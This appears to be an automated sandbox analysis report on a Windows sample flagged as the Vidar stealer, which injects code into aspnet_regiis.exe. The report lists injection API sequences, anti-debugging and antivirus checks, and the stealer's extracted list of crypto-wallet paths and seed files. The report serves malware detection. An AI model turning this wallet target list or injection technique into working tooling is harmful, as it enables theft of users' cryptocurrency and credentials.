                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00418950
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]3_2_004014AD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]3_2_0040148A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]3_2_004014A2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00418599 mov eax, dword ptr fs:[00000030h]3_2_00418599
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041859A mov eax, dword ptr fs:[00000030h]3_2_0041859A
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D7643E0 GetProcessHeap,0_2_6D7643E0
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D760D6C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D760D6C
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D75CDD2 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6D75CDD2
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D75C8A7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6D75C8A7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0041D016
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0041D98C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0042762E SetUnhandledExceptionFilter,3_2_0042762E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC5B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6CC5B66C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CC5B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CC5B1F7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_6CE0AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6CE0AC62
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Yara detected Powershell download and execute
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7500, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7620, type: MEMORYSTR
                          Allocates memory in foreign processes
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 protect: page execute and read and writeJump to behavior
                          Contains functionality to inject code into remote processes
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D749EF0 GetGameData,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,Wow64GetThreadContext,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,ReadProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,CreateProcessW,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,0_2_6D749EF0
                          Injects a PE file into a foreign processes
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000 value starts with: 4D5AJump to behavior
                          Searches for specific processes (likely to inject)
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_004124A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,3_2_0041257F
                          Writes to foreign memory regions
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 400000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 401000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 430000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 43D000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 670000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 671000Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: BC3008Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D75CF98 cpuid 0_2_6D75CF98
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,3_2_00410DDB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_0042B0CC
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_0042B1C1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429A50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_0042B268
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_0042B2C3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_0042AB40
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_004253E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_0042B494
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_0042749C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: EnumSystemLocalesA,3_2_0042B556
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00429D6E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,3_2_0042E56F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00427576
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_00428DC4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B5E7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0042B580
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_0042B623
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: GetLocaleInfoA,3_2_0042E6A4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6D75CA1B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6D75CA1B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,3_2_00410C53
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_00410D2E GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,3_2_00410D2E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.0000000003108000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2579771123.000000000314A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected Vidar
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Yara detected Vidar stealer
                          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.aspnet_regiis.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d771000.7.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d771000.7.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.6d740000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7500, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 7620, type: MEMORYSTR
                          Found many strings related to Crypto-Wallets (likely being stolen)
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: window-state.json
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: info.seco
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Exodus
                          Source: aspnet_regiis.exe, 00000003.00000002.2579443160.0000000000CEE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: *ethereum*.*
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: MultiDoge
                          Source: aspnet_regiis.exe, 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: seed.seco
                          Source: aspnet_regiis.exe, 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger 